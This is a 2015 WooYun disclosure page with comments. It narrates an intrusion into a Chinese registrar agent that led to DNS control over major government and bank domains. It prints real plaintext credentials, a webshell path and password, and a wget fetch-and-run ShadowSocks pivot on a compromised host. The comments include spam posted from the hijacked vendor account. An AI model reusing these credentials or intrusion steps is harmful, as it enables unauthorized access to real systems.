当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120533

漏洞标题:中科三方某系统漏洞导致12306/中国人民银行/等各大gov域名可被劫持(涉及大量内部系统/网络设备等/已劫持厂商乌云账号)

相关厂商:北京中科三方网络技术有限公司

漏洞作者: 小胖子

提交时间:2015-06-15 00:07

修复时间:2015-06-19 21:17

公开时间:2015-06-19 21:17

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

不知道浩天表弟的command键坏了没?
虽然困难重重,但是就是要突破千难万阻。

详细说明:

嗯,就是这个服务商,你没有猜错,中科三方。
北京中科三方网络技术有限公司成立于2000年,坐落于中国的硅谷------北京市中关村的核心地区,中科院软件园内。是隶属于中国科学院的 互联网信息化基础服务企业,也是中国互联网络信息中心(CNNIC)的代理商。
首先的突破点是 oa.sfn.cn
存在很多个弱口令 最初找到 qiyin 111111
进入系统

oa.jpg


居然在人力资源有权限重置管理员账户,重置admin的密码为 wooyuntest123
用通用漏洞getshell

oa.jpg


http://oa.sfn.cn/oa/JHSoft.Web.Portal/Default/wooyun.aspx 密码 cmd1
当然需要过狗刀才行。
然后拿到web.config 居然是sa

mask 区域 
*****8r*****


想用最新的exp打system权限,居然不行(被启明星辰的给干掉了)

shell.jpg


然后读了oa的user表备用。
然后user表的密码居然是sha1加密,还没有混淆。
顺利从mail.sfn.cn 摸进老大CEO的邮箱。

z.jpg


然后里面是各种密码飞啊,此时仅靠邮箱内密码已经可以劫持南京银行等多个gov域名

njpass.jpg


nanjingbank.jpg


.
南京银行,广西省人事考试中心等。

漏洞证明:

在OA已经摸清楚了组织架构。
也拿到了一些人的常用密码(在OA和邮箱都能登陆的肯定是常用密码)
此时找到后台 http://admin.sfn.cn
用 liruijing kuaikuailele123 登陆
居然发现登陆后,burp抓包,登陆成功,进入管理页面,又瞬间loction跳出
这是个什么节奏?难道是IP限制?
试过XFW修改IP等一系列办法,包括通过邮箱重置密码为

mask 区域 
*****kr*****

依旧不能登录
最终在邮箱找到这个才明白。

y.jpg


哦,信任域以外就不要想了。看来是判断真实IP了,非办公IP不能登录后台。
那这下怎么办呢,找找办公IP呗,顺带撸了很多密码

mima.jpg


也撸了很多系统登录地址。

xit.jpg


每个员工一个公网IP的公司是多么的土豪。

pc.jpg


此时有了思路,扫描员工的电脑,说不定又那啥ms08067(我又想多了)
扫到类似 210.72.13.160 开了 3389的XP电脑 可惜啊 没猜出也没射出密码。
静下来想了下,既然能给110那么高的规则,其他的也肯定是有限制,那能从哪里撸进去呢。
想了想,那么多的口令不用可不浪费了吗?
扫描出开了 22和22022端口的机器,暴力扫出 210.72.13.48 的ssh弱口令

root.jpg


有了root 我们看看在不在信任域

nmap.png


nmap扫110扫出很多个端口。看来必定在信任域
传个proxy脚本上去访问下端口看看情况先

c.jpg


既然在信任域,那能玩的姿势就太多了,转发,VPN,代理。
这里用zone 猪猪侠等的内网边界神器,统统不好使。

fhq.jpg


后来发现是防火墙作祟,那该怎么办?
静思三秒,决定走ShadowSocks
防火墙只放行80,那我们就先暂停他的80服务,然后开代理进去看看。
说做就做,ShadowSocks代理姿势如下:
wget --no-check-certificate http://7sbp7c.com1.z0.glb.clouddn.com/shadowsocks-go.sh
chmod +x shadowsocks-go.sh
./shadowsocks-go.sh 2>&1 | tee shadowsocks-go.log
依次安装好,输入密码。

w.jpg


默认完成是这样的
但是默认是443端口,这个IP下防火墙都不放行,没办法,停掉apache,停掉代理,改配置
service httpd stop
/etc/init.d/shadowsocks stop
查看配置 vi改

w.jpg


这是修改后的配置

vi.jpg


用白名单的80端口
然后启动服务
/etc/init.d/shadowsocks start
配置好代理

dail.jpg


注意密码加密格式,现在本机1080已经有S5代理,不过全局就行啦,直接IE打开
查看下IP 已经是了

keji.jpg


进入后台 果断的放行了这次
12306的

tiedaobu.jpg


你们的接口居然直接查询用户的明文密码!!!!

mimachaxun.jpg


后台可以改解析,主站也可以改

12306.jpg


中国人民银行也在这里哟

pbc.jpg


太多gov域名了,表哥拒绝查水表!!!

修复方案:

信任域也要有严格的判断,你们不是有mac绑定么!
我是不是要自己给自己来个20rank呢?

wooyun.jpg

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-15 11:13

厂商回复:

正在处理。

最新状态:

2015-06-19:乌云的白帽子都是大傻逼!

2015-06-19:乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!

2015-06-19:100万元悬赏,帮我门公司继续找出漏洞者,都可以领取这100万元的奖金!本公告时效一周!

漏洞评价:

评论

这些评论似乎很乌云~~~思密达
  1. 2015-06-20 13:29 | 北京中科三方网络技术有限公司(乌云厂商)

    中科三方针对黑客攻击声明:6月19日,中科三方乌云帐号受到不明身份黑客恶意攻击,并且黑客针对公司邮箱采取了多种手段的攻击。经过白帽子小胖子的协助,我公司技术人员的全力维护,客户资料未受影响,公司现已修复了上述漏洞,并修复了小胖子测试漏洞,但因为攻击导致黑客冒充公司发贴给大家带来一定影响。中科三方一向重视和客户的共同利益,严正抗议无论出于何种目的的黑客攻击,公司不会以任务方式与不法分子谈判,并坚决反对任何此类黑客行为。目前我司已向监管部门报案,将配合有关部门对此事进行调查。中科三方感谢广大白帽子的关注,我们也将会采取各项措施,竭尽全力继续维护业务的安全运营,为企业互联网基础服务的发展提供更好的服务。中科三方网络技术有限公司2015年6月20日

  1. 2015-06-15 00:08 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    下雨吗?

  2. 2015-06-15 00:10 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @小胖子 终于有个精华了啊,恭喜表哥破*

  3. 2015-06-15 00:11 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    表哥一个漏洞就农民翻身把歌唱了

  4. 2015-06-15 00:11 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    在我心里 表哥 就是 核心

  5. 2015-06-15 00:11 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | IDC商)

    乌云指定IDC www.80host.com 前排围观

  6. 2015-06-15 00:13 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    前排出售瓜子饮料VIP专座!

  7. 2015-06-15 00:17 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    胖爷,等你进去了我们给你送水果去。

  8. 2015-06-15 00:18 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @园长 哪个儿豁!

  9. 2015-06-15 00:27 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    @胖爷 真是够牛呀

  10. 2015-06-15 00:34 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    醉了

  11. 2015-06-15 00:48 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    哇塞!

  12. 2015-06-15 00:55 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    经验证:中国工商银行 icbc.com.cn、新浪网sina.cn 、人民网people.com.cn 、万达集团 wanda.com.cn等众多金融、IT企业,也纷纷躺枪,当这些企业和部门正将内部安全一步步扎实做好的时候,却在域名源头出了问题,印证了那一句话:安全是一个整体。希望厂商能尽快修复漏洞。

  13. 2015-06-15 05:15 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    胖爷你这是发飙吗

  14. 2015-06-15 05:50 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    表哥叼爆了。

  15. 2015-06-15 07:33 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    屌爆了

  16. 2015-06-15 07:48 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    吊吊吊

  17. 2015-06-15 08:39 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    碉堡了

  18. 2015-06-15 09:10 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    你这么叼,你家里人知道吗?

  19. 2015-06-15 09:17 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    @小胖子 胖爷我回给你送痔疮精油

  20. 2015-06-15 09:26 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    niubility

  21. 2015-06-15 09:37 | Breaker ( 路人 | Rank:12 漏洞数:1 )

    diao

  22. 2015-06-15 09:39 | 有归于无 ( 实习白帽子 | Rank:84 漏洞数:15 | 有归于无)

    表哥不愧是我的偶像

  23. 2015-06-15 09:41 | wy007 ( 实习白帽子 | Rank:95 漏洞数:10 | 其实我是一名卧底...)

    这个有点叼,群起围观...

  24. 2015-06-15 09:43 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    好厉害,关注下 @浩天 浩天哥哥 你惊呆没?

  25. 2015-06-15 09:45 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @’‘Nome 诶呦卧槽,我都吓尿了

  26. 2015-06-15 09:54 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @浩天 嫂子看你吓尿 的样子会怎么样。。。。

  27. 2015-06-15 10:09 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    表哥,你又不带我出去装逼

  28. 2015-06-15 10:23 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @小川 你的核心快因为表哥的这个漏洞掉了

  29. 2015-06-15 12:17 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    就知道表哥不愿做第一页没有雷的男人

  30. 2015-06-15 12:19 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    哈哈,发礼物了。

  31. 2015-06-15 15:29 | feng ( 普通白帽子 | Rank:664 漏洞数:79 | 想刷个6D)

    恭喜表哥

  32. 2015-06-15 18:34 | 时光love叶子 ( 路人 | Rank:30 漏洞数:7 | 苦逼高中生。。。不能废话了 上课去了 ...)

    天天牛啊

  33. 2015-06-15 19:09 | 索尘 ( 路人 | Rank:25 漏洞数:3 | Focus on web security. 关注网络,爱生活...)

    这个洞好熟悉啊啊啊啊

  34. 2015-06-19 21:23 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    乌云的白帽子都是大傻逼!

  35. 2015-06-19 21:23 | 北京中科三方网络技术有限公司(乌云厂商)

    乌云的白帽子都是大傻逼!

  36. 2015-06-19 21:24 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    @小胖子 表哥 有人来挑衅你了

  37. 2015-06-19 21:24 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    厂商回复是怎么了!

  38. 2015-06-19 21:25 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    - -

  39. 2015-06-19 21:26 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    卧槽 - -

  40. 2015-06-19 21:30 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    @北京中科三方网络技术有限公司 你奖金给扣了?还是被开除了

  41. 2015-06-19 21:31 | 北京中科三方网络技术有限公司(乌云厂商)

    黑掉我所有的所有服务器吧!

  42. 2015-06-19 21:32 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    绝壁是小胖子在自(。・∀・)ノ゙嗨4

  43. 2015-06-19 21:32 | 北京中科三方网络技术有限公司(乌云厂商)

    @Me_Fortune 我是经理,我会被开除了!

  44. 2015-06-19 21:37 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | IDC商)

    最新状态:2015-06-19:乌云的白帽子都是大傻逼!

  45. 2015-06-19 21:38 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    被辞退前的愤怒么?

  46. 2015-06-19 21:40 | null_z ( 普通白帽子 | Rank:251 漏洞数:30 )

    @xsser@浩天厂商回复。。。。

  47. 2015-06-19 21:40 | 北京中科三方网络技术有限公司(乌云厂商)

    @niliu 呵呵!

  48. 2015-06-19 21:44 | 千斤拨四两 ( 普通白帽子 | Rank:510 漏洞数:88 | 是时候表演真正的技术了。。。)

    疯了吧

  49. 2015-06-19 21:45 | 安全小飞侠 ( 实习白帽子 | Rank:75 漏洞数:12 | 安全小飞侠就是我,我就是安全小飞侠!)

    我勒个去,自嗨啊!!!怕是玩大了点吧

  50. 2015-06-19 21:46 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    最新状态: 2015-06-19:乌云的白帽子都是大傻逼!

  51. 2015-06-19 21:46 | 大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)

    最新状态: 2015-06-19:乌云的白帽子都是大**!

  52. 2015-06-19 21:48 | null_z ( 普通白帽子 | Rank:251 漏洞数:30 )

    默哀,百度,阿里巴巴,腾讯三巨头家的漏洞列表是你们家的好几倍也没见谁为漏洞背锅,安全问题都不能直视的厂商还有什么未来,祝兄弟去家更好的公司

  53. 2015-06-19 21:48 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    快把cnnic.cn HOLD了

  54. 2015-06-19 21:49 | 咚咚呛 ( 普通白帽子 | Rank:116 漏洞数:10 | 我是一只小毛驴咿呀咿呀呦~~)

    犀利啊!

  55. 2015-06-19 21:50 | 冰麒麟 ( 路人 | Rank:0 漏洞数:2 | 就算是男孩子,只要可爱就没问题了.)

    学到了很多!!

  56. 2015-06-19 21:50 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    我去。。。

  57. 2015-06-19 21:50 | 北京中科三方网络技术有限公司(乌云厂商)

    @null_z 一路走好

  58. 2015-06-19 22:05 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @北京中科三方网络技术有限公司 发生什么事了?

  59. 2015-06-19 22:15 | 牧马 ( 普通白帽子 | Rank:107 漏洞数:17 | 我是要成为猪猪侠的男人。。。。)

    @北京中科三方网络技术有限公司 怎么了?希望了解详情……有什么事可以和大家说说……抱怨一下呀啥的都没关系

  60. 2015-06-19 22:20 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @北京中科三方网络技术有限公司 别乱骂人,素质呢

  61. 2015-06-19 22:20 | 北京中科三方网络技术有限公司(乌云厂商)

    @牧马 你们没有办法在攻击我的网站了!现在如果谁破解了,我公司愿意奖金100万!

  62. 2015-06-19 22:21 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @北京中科三方网络技术有限公司 真的假的,100w,先拿出告文再说,空口无凭

  63. 2015-06-19 22:24 | 北京中科三方网络技术有限公司(乌云厂商)

    @子非海绵宝宝 @niliu @雅柏菲卡 @牧马 @黑暗游侠 大家都可以试试!

  64. 2015-06-19 22:25 | 我爱水秀天蓝 ( 普通白帽子 | Rank:103 漏洞数:15 | 好好学习,天天向上!)

    niubi,围观留名。。

  65. 2015-06-19 22:26 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @北京中科三方网络技术有限公司 莫非领导警告你了?

  66. 2015-06-19 22:29 | 北京中科三方网络技术有限公司(乌云厂商)

    @小川 @浩天 @梧桐雨 @孤独雪狼 @feng @千斤拨四两 @无敌L.t.H @北京中科三方网络技术有限公司 @雅柏菲卡 @牧马 @黑暗游侠 @我爱水秀天蓝 @雅柏菲卡 100万元悬赏,帮我门公司继续找出漏洞者,都可以领取这100万元的奖金! 本公告时效一周!

  67. 2015-06-19 22:31 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @北京中科三方网络技术有限公司 我觉得,把漏洞修补了,避免进一步的损失,才是正确的做法。工作有疏漏是难免的,关键的是怎么样做的完善。有漏洞不可怕,最怕的是面对漏洞的态度不端正。 祝你天天开心,幸福每一天。

  68. 2015-06-19 22:33 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @北京中科三方网络技术有限公司 我爱你

  69. 2015-06-19 22:34 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @北京中科三方网络技术有限公司 任何*.sfn.cn下的都算还是?

  70. 2015-06-19 22:36 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    得到官方回复,厂商邮件服务器被搞了,看热闹的散了吧。另外,用厂商号乱回复的家伙,你最好看看你家水表是不是钛合金的。

  71. 2015-06-19 22:38 | JGHOOluwa ( 普通白帽子 | Rank:206 漏洞数:32 | 就是来看看大牛们如何超神的^-^)

    呃,我就说嘛,厂商分给得这么高,怎么忽然就这样了。。。

  72. 2015-06-19 22:39 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

    醉了醉了

  73. 2015-06-19 22:44 | 我爱水秀天蓝 ( 普通白帽子 | Rank:103 漏洞数:15 | 好好学习,天天向上!)

    @黑暗游侠 当真了,拿到奖金给我分一点点就行,哈哈……

  74. 2015-06-19 22:45 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @我爱水秀天蓝 已经挖到了。。。

  75. 2015-06-19 22:59 | 白开水 ( 普通白帽子 | Rank:242 漏洞数:27 | 苍茫的天涯是我的爱~)

    cctv看这里~

  76. 2015-06-19 23:12 | 高小厨 ( 普通白帽子 | Rank:814 漏洞数:74 | 不会吹牛的小二不是好厨子!)

    醉了

  77. 2015-06-19 23:29 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @黑暗游侠 100W没了....

  78. 2015-06-19 23:48 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    @黑暗游侠 100W没了....

  79. 2015-06-20 00:06 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    @北京中科三方网络技术有限公司 千万不要低估乌云白帽的实力,就算防的再好,也会被攻破的

  80. 2015-06-20 00:43 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    看醉了。。。

  81. 2015-06-20 01:03 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    @GrayTrack 真相是有人冒用厂商的账号在这里乱发

  82. 2015-06-20 01:05 | KingSange ( 路人 | Rank:2 漏洞数:2 | 农民工渗透组)

    @北京中科三方网络技术有限公司 厂商的回复神了!估计又要爆菊花了~~~

  83. 2015-06-20 10:20 | 纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)

    卖香烟,瓜子,汽水,仓井充气娃,我站在最后面

  84. 2015-06-20 13:29 | 北京中科三方网络技术有限公司(乌云厂商)

    中科三方针对黑客攻击声明:6月19日,中科三方乌云帐号受到不明身份黑客恶意攻击,并且黑客针对公司邮箱采取了多种手段的攻击。经过白帽子小胖子的协助,我公司技术人员的全力维护,客户资料未受影响,公司现已修复了上述漏洞,并修复了小胖子测试漏洞,但因为攻击导致黑客冒充公司发贴给大家带来一定影响。中科三方一向重视和客户的共同利益,严正抗议无论出于何种目的的黑客攻击,公司不会以任务方式与不法分子谈判,并坚决反对任何此类黑客行为。目前我司已向监管部门报案,将配合有关部门对此事进行调查。中科三方感谢广大白帽子的关注,我们也将会采取各项措施,竭尽全力继续维护业务的安全运营,为企业互联网基础服务的发展提供更好的服务。中科三方网络技术有限公司2015年6月20日

  85. 2015-06-20 13:32 | whitehat ( 路人 | Rank:2 漏洞数:1 | 用心,認真,努力,負責任...)

  86. 2015-06-20 14:36 | 稀饭粥 ( 路人 | Rank:8 漏洞数:1 | WSNhacking)

    ……微博看到的,然后我来了

  87. 2015-06-20 14:53 | justpluto ( 路人 | Rank:15 漏洞数:1 | exploit%00)

    下雨了

  88. 2015-06-20 15:07 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @北京中科三方网络技术有限公司 修复了 那还不把 乌云上面的简介更改了???你想怎么地??

  89. 2015-06-20 15:29 | 腹黑 ( 路人 | Rank:14 漏洞数:10 | (◦ "̮ ◦))

    也是醉了~

  90. 2015-06-20 15:31 | devil ( 路人 | Rank:2 漏洞数:2 | 小小菜鸟!多多指教)

    @北京中科三方网络技术有限公司 要疯的节奏...控制情绪啊!

  91. 2015-06-20 15:31 | 几何黑店 ( 核心白帽子 | Rank:1527 漏洞数:231 | 我要低调点儿.......)

    @’‘Nome 报案了的话,这就是证据

  92. 2015-06-22 11:05 | jeffreys125 ( 实习白帽子 | Rank:63 漏洞数:14 | 懒人。。)

    以前记得中科三方有个支付漏洞,那时看wooyun没这个厂商就给客服说了。。

  93. 2015-06-23 19:39 | 斯杰 ( 路人 | Rank:10 漏洞数:5 | By:S丶jer)

    被吓到了

  94. 2015-06-23 23:26 | 白泽 ( 普通白帽子 | Rank:114 漏洞数:9 | @伏宸安全 树叶的一生只是为了归根)

  95. 2015-06-23 23:37 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    ...我是来看评论的

  96. 2015-06-26 18:00 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  97. 2015-06-27 11:08 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    有些白帽子确实,有些地方是不能提交的,即便你发现了

  98. 2015-06-29 12:43 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    @北京中科三方网络技术有限公司 我擦,挖到漏洞给100万。真的假的。

  99. 2015-06-29 13:54 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    要被去喝茶的节奏了

  100. 2015-06-30 10:31 | SuperRookie ( 实习白帽子 | Rank:39 漏洞数:7 | 求收编,本人会注入,会上传,会Xss,会破...)

    各位请仔细阅读 下面的话 明确表明了 以任何目的做安全测试 也就是说 你就算 友情检测 也是违法的 别以为挂着wooyun 就可以随便搞中科三方针对黑客攻击声明: 6月19日,中科三方乌云帐号受到不明身份黑客恶意攻击,并且黑客针对公司邮箱采取了多种手段的攻击。 经过白帽子小胖子的协助,我公司技术人员的全力维护,客户资料未受影响,公司现已修复了上述漏洞,并修复了小胖子测试漏洞,但因为攻击导致黑客冒充公司发贴给大家带来一定影响。 中科三方一向重视和客户的共同利益,严正抗议无论出于何种目的的黑客攻击,公司不会以任务方式与不法分子谈判,并坚决反对任何此类黑客行为。 目前我司已向监管部门报案,将配合有关部门对此事进行调查。 中科三方感谢广大白帽子的关注,我们也将会采取各项措施,竭尽全力继续维护业务的安全运营,为企业互联网基础服务的发展提供更好的服务。 中科三方网络技术有限公司 2015年6月20日

  101. 2015-06-30 10:56 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下,把梦做完|最近小忙,有问题可以...)

    乌云的白帽子都是大傻逼!

  102. 2015-06-30 10:56 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下,把梦做完|最近小忙,有问题可以...)

    乌云的白帽子都是大傻逼!

  103. 2015-07-10 18:18 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)

    精彩

  104. 2015-07-14 20:58 | DBA ( 路人 | Rank:11 漏洞数:3 | DBA)

    转发那块可以直接ssh端口转发,然后本地chrome插件sock5代理吧。

  105. 2015-07-14 21:00 | DBA ( 路人 | Rank:11 漏洞数:3 | DBA)

    转发那块可以直接ssh端口转发,然后本地chrome插件sock5代理吧。